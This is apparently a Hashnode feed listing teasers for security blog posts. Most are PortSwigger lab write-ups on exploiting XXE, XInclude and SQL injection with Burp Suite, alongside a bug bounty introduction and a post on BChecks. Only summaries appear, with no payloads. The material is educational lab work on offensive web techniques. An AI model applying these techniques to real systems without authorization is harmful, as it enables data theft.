Joel O.joelodey.hashnode.dev·Apr 29, 2024Lab: Exploiting XXE using external entities to retrieve filesLab Scenario: Our mission is to exploit XXE through a web application's "Check stock" feature, specifically using external entities to retrieve files. By intercepting and manipulating a POST request, we intend to use XXE to trigger the retrieval of s...DiscussPortSwigger XML external entity (XXE) injectionxxe
Joel O.joelodey.hashnode.dev·Apr 16, 2024Lab: Exploiting XInclude to retrieve filesLab Scenario: Our mission is to exploit XInclude through a web application's "Check stock" feature. By intercepting and manipulating a POST request, we intend to use XInclude to retrieve files from the server. Let's proceed with the solution: Interc...DiscussPortSwigger XML external entity (XXE) injectionxxe
Prasun Rayprasunray477.hashnode.dev·Apr 10, 2024The Bug Bounty ChroniclesIntroduction to web servers, web applications, and their configurations. What is a "Web Server"A web server is the core software/hardware that stores websites and facilitates the client-server communication required to view web pages over the interne...Discuss·10 likesbugbounty
Joel O.joelodey.hashnode.dev·Apr 8, 2024Lab: SQL injection attack, listing the database contents on non-Oracle databasesIn this educational guide, we will explore the practical application of Burp Suite to identify and exploit SQL injection vulnerabilities, highlighting the importance of robust security practices. Step 1: Intercepting and Modifying Requests with Burp ...DiscussPortSwigger SQL injection (SQLi) Labs#sqlinjection
Joel O.joelodey.hashnode.dev·Apr 1, 2024Lab: SQL injection UNION attack, retrieving data from other tablesIn this educational guide, we will walk through the process of using Burp Suite to intercept and modify requests, focusing on the product category filter. Our objective is to unveil potential SQL injection vulnerabilities, understand the database str...DiscussPortSwigger SQL injection (SQLi) LabsSQLi
Joel O.joelodey.hashnode.dev·Mar 25, 2024Lab: SQL injection attack, querying the database type and version on OracleTo exploit SQL injection, it's crucial to understand the structure of the database query. Use a payload to determine the number of columns returned by the query and identify columns containing text data. For instance, inject the following payload int...DiscussPortSwigger SQL injection (SQLi) Labs#sqlinjection
Joel O.joelodey.hashnode.dev·Mar 18, 2024Lab: SQL injection UNION attack, determining the number of columns returned by the querySQL injection is a serious security risk for web applications, and Burp Suite can be used to identify and address these vulnerabilities. This guide shows how to use Burp Suite to intercept and modify requests, specifically focusing on the product cat...DiscussPortSwigger SQL injection (SQLi) Labsportswigger
Kaustubh RaiforBreachForcebreachforce.net·Mar 9, 2024Streamlining Security Assessments with BChecksAll of us - security professionals - use Burp Suite every day, whether as red teamers or blue teamers. With our experience in the industry, we've encountered scenarios where we'd like to remember specific test cases for particular categories. We ofte...Discuss·10 likes·71 readsbchecks
Joel O.joelodey.hashnode.dev·Mar 5, 2024Lab: SQL injection UNION attack, finding a column containing textIn this lab, our goal is to determine the number of columns returned by the query, offering a valuable insight into potential SQL injection vulnerabilities. Step 1: Intercepting and Modifying Requests with Burp Suite Burp Suite, a versatile web appli...DiscussPortSwigger SQL injection (SQLi) LabsBurpsuite
Joel O.joelodey.hashnode.dev·Feb 26, 2024Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden dataLab Scenario: Our objective is to understand and exploit a SQL injection vulnerability in the WHERE clause of a web application's stock check feature. By carefully probing and bypassing security measures, we aim to retrieve hidden data and ultimately...Discuss·1 likePortSwigger SQL injection (SQLi) Labs#sqlinjection